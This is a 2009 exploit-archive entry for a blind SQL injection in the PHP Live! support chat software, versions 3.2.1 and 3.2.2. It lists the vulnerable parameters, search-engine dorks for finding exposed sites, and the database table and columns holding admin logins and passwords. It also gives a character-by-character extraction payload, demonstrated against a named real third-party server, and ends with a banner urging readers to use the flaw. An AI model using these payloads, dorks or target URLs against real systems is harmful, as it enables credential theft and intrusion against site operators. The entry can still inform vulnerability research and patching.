PHP Live! 3.2.1/2 - 'x' Blind SQL Injection



EKU-ID: 16960 CVE: OSVDB-63310;CVE-2009-4749;OSVDB-63309 OSVDB-ID:
Author: boom3rang Published: 2009-07-16 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


  PhpLive 3.2.1/2 (x) Blind SQL injection                                       [_][-][X]
      _  ___  _  ___      ___ ___ _____      __  ___ __   __  ___
     | |/ / || |/ __|___ / __| _ \ __\ \    / / |_  )  \ /  \/ _ \
     | ' <| __ | (_ |___| (__|   / _| \ \/\/ /   / / () | () \_, /
     |_|\_\_||_|\___|    \___|_|_\___| \_/\_/   /___\__/ \__/ /_/


      Red n'black i dress eagle on my chest.
      It's good to be an ALBANIAN Keep my head up high for that flag i die.
      Im proud to be an ALBANIAN
   ###################################################################

       Author         	: boom3rang
       Contact        	: boom3rang[at]live.com
       Greetz   	: H!tm@N - KHG - cHs

		  R.I.P redc00de
   -------------------------------------------------------------------

                  Affected software description
       Software 	: PhpLive
       Vendor		: http://www.phplivesupport.com
       Price 	      	: Live Support Download Starts at $89.95
       Version Vuln.    : v3.2.1 & v3.2.2
   -------------------------------------------------------------------

    [~] SQLi :

    http://www.TARGET.com/message_box.php?theme=&l=[USERNAME]&x=[SQLi]
    http://www.TARGET.com/request.php?l=[USERNAME]&x=[SQLi]


    [~]Google Dork :

    Powered by PHP Live! v3.2.1
    Powered by PHP Live! v3.2.2
    allinurl:"request.php" "deptid"

   -------------------------------------------------------------------

    [~] Table_NAME  =  chat_admin
    [~] Column_NAME =  login - password - email - userID - name
   -------------------------------------------------------------------

    [~] Admin Path :

    http://www.TARGET.com/phplive
   -------------------------------------------------------------------
    [~] Live Demo:

    http://chat.apolloservers.com/phplive/request.php?l=admin&x=1 AND 1=1    --> True
    http://chat.apolloservers.com/phplive/request.php?l=admin&x=1 AND 1=2    --> False

   -------------------------------------------------------------------

    [~] ASCII

  /**/and/**/ascii(substring((select/**/concat(login,0x3a,password)/**/from/**/chat_admin/**/limit/**/1,1),1,1))>100

   -------------------------------------------------------------------

    [~] Live Demo ASCII

      True
   http://chat.apolloservers.com/phplive/request.php?l=admin&x=1/**/and/**/ascii(substring((select/**/concat(login,0x3a,password)/**/from/**/chat_admin/**/limit/**/1,1),1,1))>48

      False
   http://chat.apolloservers.com/phplive/request.php?l=admin&x=1/**/and/**/ascii(substring((select/**/concat(login,0x3a,password)/**/from/**/chat_admin/**/limit/**/1,1),1,1))>127

   ============================================================================
   | USE this vulnerability, to improve your skills for Social Engineering  ;)  |
   ============================================================================

# milw0rm.com [2009-07-16]